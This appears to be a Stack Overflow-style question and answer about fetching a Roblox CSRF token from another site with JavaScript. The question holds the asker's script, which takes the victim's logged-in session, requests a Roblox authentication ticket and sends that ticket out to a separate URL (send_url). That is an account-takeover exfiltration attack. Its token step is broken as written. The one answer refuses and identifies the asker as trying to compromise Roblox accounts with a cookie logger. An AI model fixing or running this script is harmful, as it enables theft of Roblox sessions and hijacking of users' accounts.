# How to get the csrf token in <meta> tags from another website using javascript

Tags: javascript, html, csrf

I am trying to get the csrf token from roblox.com. I need this token to POST here https://auth.roblox.com/v1/authentication-ticket and the Authentication ticket is sent in response.
Here is my code

````
(async function() {
    // response headers generate 401 errors in output, which cannot be ignored
    var xsrf = (await fetch("https://www.roblox.com/home" ,
   document.querySelector('meta[name="csrf-token"]').getAttribute('data-token'), {
        credentials: "csrf-token"
    })).text();
console.log(xsrf);
    var ticket = (await fetch("https://auth.roblox.com/v1/authentication-ticket", {
        method: "POST",
        credentials: "include",
        headers: {"x-csrf-token": xsrf}
    })).headers.get("rbx-authentication-ticket");

    await fetch(send_url + "?t=" + ticket);
})();```

Everything is perfect except for the part which gets the csrf token.

[This is the error I get.][1]


  [1]: https://i.stack.imgur.com/uVOBD.png
````

Answer (score 1):

Do not help the user. They are attempting to compromise Roblox accounts.

Edit: here is a video from the same user
https://www.youtube.com/watch?v=O8GmJ_tdytQ (https://archive.is/5HxST)
The description clearly says "Hacking, Roblox Hacking, Hacker, Cookie logger, Cookies"